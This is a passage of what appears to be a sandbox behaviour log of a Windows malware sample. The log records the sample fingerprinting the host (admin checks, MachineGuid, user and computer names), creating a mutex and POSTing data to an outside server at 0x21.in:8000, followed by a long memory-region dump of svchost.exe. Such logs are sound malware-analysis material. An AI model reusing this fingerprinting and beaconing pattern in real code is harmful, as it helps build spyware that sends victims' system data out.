IsMember=0x7ffcb0 | out: IsMember=0x7ffcb0) returned 1 [0204.634] AllocateAndInitializeSid (in: pIdentifierAuthority=0x7ffcb9, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x7ffcb4 | out: pSid=0x7ffcb4*=0x85bd18*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0204.634] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x85bd18*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x7ffcb0 | out: IsMember=0x7ffcb0) returned 1 [0204.634] AllocateAndInitializeSid (in: pIdentifierAuthority=0x7ffcb6, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x7ffca8 | out: pSid=0x7ffca8*=0x85bcb8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0204.636] LookupAccountSidA (in: lpSystemName=0x0, Sid=0x85bcb8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x0, cchName=0x7ffcb0, ReferencedDomainName=0x0, cchReferencedDomainName=0x7ffcac, peUse=0x7ffca4 | out: Name=0x0, cchName=0x7ffcb0, ReferencedDomainName=0x0, cchReferencedDomainName=0x7ffcac, peUse=0x7ffca4) returned 0 [0204.658] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x85bcb8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), IsMember=0x7ffca0 | out: IsMember=0x7ffca0) returned 1 [0204.663] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x7ffc34 | out: phkResult=0x7ffc34*=0x188) returned 0x0 [0204.663] RegQueryValueExW (in: hKey=0x188, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x7ffc3c, lpData=0x7ffa34, lpcbData=0x7ffc38*=0xfe | out: lpType=0x7ffc3c*=0x1, lpData="03845cb8-7441-4a2f-8c0f-c90408af5778", lpcbData=0x7ffc38*=0x4a) returned 0x0 [0204.664] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="03845cb8-7441-4a2f-8c0f-c90408af5778", cchWideChar=36, lpMultiByteStr=0x7fec60, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="03845cb8-7441-4a2f-8c0f-c90408af5778þÿÿÿ\x14ï\x7f", lpUsedDefaultChar=0x0) returned 36 [0204.665] SysReAllocStringLen (in: pbstr=0x7ffca8*=0x0, psz="?", len=0x1 | out: pbstr=0x7ffca8*="?") returned 1 [0204.665] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x7ffa64, lpdwDisposition=0x0 | out: phkResult=0x7ffa64*=0x184, lpdwDisposition=0x0) returned 0x0 [0204.665] RegQueryValueExW (in: hKey=0x184, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x7ffa6c, lpcbData=0x7ffa68*=0x100 | out: lpType=0x0, lpData=0x7ffa6c*=0x57, lpcbData=0x7ffa68*=0x1e) returned 0x0 [0204.666] RegCloseKey (hKey=0x184) returned 0x0 [0204.666] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="Windows 10 Pro", cchWideChar=14, lpMultiByteStr=0x7fec60, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows 10 Pro4a2f-8c0f-c90408af5778þÿÿÿ\x14ï\x7f", lpUsedDefaultChar=0x0) returned 14 [0204.666] GetUserNameW (in: lpBuffer=0x7ffa6c, pcbBuffer=0x7ffa68 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x7ffa68) returned 1 [0204.670] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="RDhJ0CNFevzX", cchWideChar=12, lpMultiByteStr=0x7fec60, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDhJ0CNFevzXro4a2f-8c0f-c90408af5778þÿÿÿ\x14ï\x7f", lpUsedDefaultChar=0x0) returned 12 [0204.670] GetComputerNameW (in: lpBuffer=0x7ffa6c, nSize=0x7ffa68 | out: lpBuffer="XC64ZB", nSize=0x7ffa68) returned 1 [0204.670] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="XC64ZB", cchWideChar=6, lpMultiByteStr=0x7fec60, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XC64ZBNFevzXro4a2f-8c0f-c90408af5778þÿÿÿ\x14ï\x7f", lpUsedDefaultChar=0x0) returned 6 [0204.671] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="A743A547-9C1AFDB0-AEA27C97-73E39B07-D5BBC660F") returned 0x18c [0204.671] GetLastError () returned 0x0 [0204.671] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x7ffc38 | out: phkResult=0x7ffc38*=0x190) returned 0x0 [0204.671] RegQueryValueExW (in: hKey=0x190, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x7ffc40, lpData=0x7ffa38, lpcbData=0x7ffc3c*=0xfe | out: lpType=0x7ffc40*=0x1, lpData="03845cb8-7441-4a2f-8c0f-c90408af5778", lpcbData=0x7ffc3c*=0x4a) returned 0x0 [0204.671] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="03845cb8-7441-4a2f-8c0f-c90408af5778", cchWideChar=36, lpMultiByteStr=0x7fec64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="03845cb8-7441-4a2f-8c0f-c90408af5778\x14ï\x7f", lpUsedDefaultChar=0x0) returned 36 [0204.671] SysReAllocStringLen (in: pbstr=0x7ffcac*=0x0, psz="?", len=0x1 | out: pbstr=0x7ffcac*="?") returned 1 [0204.672] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x7ffa68, lpdwDisposition=0x0 | out: phkResult=0x7ffa68*=0x194, lpdwDisposition=0x0) returned 0x0 [0204.672] RegQueryValueExW (in: hKey=0x194, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x7ffa70, lpcbData=0x7ffa6c*=0x100 | out: lpType=0x0, lpData=0x7ffa70*=0x57, lpcbData=0x7ffa6c*=0x1e) returned 0x0 [0204.672] RegCloseKey (hKey=0x194) returned 0x0 [0204.672] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="Windows 10 Pro", cchWideChar=14, lpMultiByteStr=0x7fec64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows 10 Pro4a2f-8c0f-c90408af5778\x14ï\x7f", lpUsedDefaultChar=0x0) returned 14 [0204.672] GetUserNameW (in: lpBuffer=0x7ffa70, pcbBuffer=0x7ffa6c | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x7ffa6c) returned 1 [0204.673] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="RDhJ0CNFevzX", cchWideChar=12, lpMultiByteStr=0x7fec64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDhJ0CNFevzXro4a2f-8c0f-c90408af5778\x14ï\x7f", lpUsedDefaultChar=0x0) returned 12 [0204.673] GetComputerNameW (in: lpBuffer=0x7ffa70, nSize=0x7ffa6c | out: lpBuffer="XC64ZB", nSize=0x7ffa6c) returned 1 [0204.673] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="XC64ZB", cchWideChar=6, lpMultiByteStr=0x7fec64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XC64ZBNFevzXro4a2f-8c0f-c90408af5778\x14ï\x7f", lpUsedDefaultChar=0x0) returned 6 [0204.678] GetModuleHandleA (lpModuleName="wininet.dll") returned 0x0 [0204.678] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x70830000 [0204.787] GetProcAddress (hModule=0x70830000, lpProcName="InternetOpenA") returned 0x708f85d0 [0204.788] GetProcAddress (hModule=0x70830000, lpProcName="InternetConnectA") returned 0x70970da0 [0204.788] GetProcAddress (hModule=0x70830000, lpProcName="HttpOpenRequestA") returned 0x70995860 [0204.788] GetProcAddress (hModule=0x70830000, lpProcName="HttpAddRequestHeadersA") returned 0x708ac3f0 [0204.788] GetProcAddress (hModule=0x70830000, lpProcName="HttpSendRequestA") returned 0x708f8e60 [0204.789] GetProcAddress (hModule=0x70830000, lpProcName="InternetReadFile") returned 0x708b7320 [0204.789] GetProcAddress (hModule=0x70830000, lpProcName="InternetCloseHandle") returned 0x708fd200 [0204.789] GetProcAddress (hModule=0x70830000, lpProcName="InternetCrackUrlA") returned 0x7090f730 [0204.789] GetProcAddress (hModule=0x70830000, lpProcName="InternetSetOptionA") returned 0x708d1dc0 [0204.789] InternetCrackUrlA (in: lpszUrl="http://0x21.in:8000/_az/", dwUrlLength=0x18, dwFlags=0x90000000, lpUrlComponents=0x7fee08 | out: lpUrlComponents=0x7fee08) returned 1 [0204.815] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0205.038] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x7ffc74, dwBufferLength=0x4) returned 1 [0205.038] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x7ffc74, dwBufferLength=0x4) returned 1 [0205.039] InternetConnectA (hInternet=0xcc0004, lpszServerName="0x21.in", nServerPort=0x1f40, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0205.095] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/_az/", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84003300, dwContext=0x0) returned 0xcc000c [0205.097] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="", dwHeadersLength=0x0, lpOptional=0x25305ec*, dwOptionalLength=0x63) Thread: id = 302 os_tid = 0x12d4 Thread: id = 303 os_tid = 0x12d8 Thread: id = 304 os_tid = 0x12dc Thread: id = 313 os_tid = 0x614 Thread: id = 321 os_tid = 0xcd8 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7369f000" os_pid = "0x60" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x218" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cdd2" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 895 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 896 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 897 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 898 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 899 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 900 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 901 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 902 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 903 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 904 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 905 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 906 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 907 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 908 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 909 start_va = 0x500000 end_va = 0x500fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 910 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 911 start_va = 0x530000 end_va = 0x531fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 912 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 913 start_va = 0x550000 end_va = 0x550fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 914 start_va = 0x560000 end_va = 0x561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 915 start_va = 0x570000 end_va = 0x576fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 916 start_va = 0x580000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 917 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 918 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 919 start_va = 0x660000 end_va = 0x666fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 920 start_va = 0x670000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 921 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 922 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 923 start_va = 0x6b0000 end_va = 0x6b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 924 start_va = 0x6c0000 end_va = 0x6c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 925 start_va = 0x6d0000 end_va = 0x6d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 926 start_va = 0x700000 end_va = 0x706fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 927 start_va = 0x710000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 928 start_va = 0x7d0000 end_va = 0x7d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 929 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 930 start_va = 0x900000 end_va = 0xa87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 931 start_va = 0xa90000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 932 start_va = 0xc20000 end_va = 0x101afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 933 start_va = 0x1020000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 934 start_va = 0x10a0000 end_va = 0x10e4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 935 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 936 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 937 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 938 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 939 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 940 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 941 start_va = 0x1700000 end_va = 0x177ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 942 start_va = 0x17e0000 end_va = 0x17e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 943 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 944 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 945 start_va = 0x1a00000 end_va = 0x1d36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 946 start_va = 0x1d40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 947 start_va = 0x1e40000 end_va = 0x1f1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 948 start_va = 0x1f40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 949 start_va = 0x2040000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 950 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 951 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 952 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 953 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 954 start_va = 0x2600000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 955 start_va = 0x2680000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 956 start_va = 0x2780000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 957 start_va = 0x2880000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 958 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 959 start_va = 0x2a00000 end_va = 0x2a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 960 start_va = 0x2a80000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 961 start_va = 0x2b00000 end_va = 0x2b8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 962 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 963 start_va = 0x2d00000 end_va = 0x2d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 964 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 965 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 966 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 967 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 968 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 969 start_va = 0x3600000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 970 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 971 start_va = 0x3800000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 972 start_va = 0x3900000 end_va = 0x397ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 973 start_va = 0x3980000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003980000" filename = "" Region: id = 974 start_va = 0x3a00000 end_va = 0x3a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 975 start_va = 0x3a80000 end_va = 0x3b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a80000" filename = "" Region: id = 976 start_va = 0x3b80000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 977 start_va = 0x3c80000 end_va = 0x3d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 978 start_va = 0x3d80000 end_va = 0x3e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 979 start_va = 0x3e80000 end_va = 0x3f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 980 start_va = 0x3f80000 end_va = 0x407ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f80000" filename = "" Region: id = 981 start_va = 0x40a0000 end_va = 0x40a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 982 start_va = 0x4280000 end_va = 0x4286fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004280000" filename = "" Region: id = 983 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 984 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 985 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 986 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 987 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 988 start_va = 0x4800000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 989 start_va = 0x48a0000 end_va = 0x48a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048a0000" filename = "" Region: id = 990 start_va = 0x48d0000 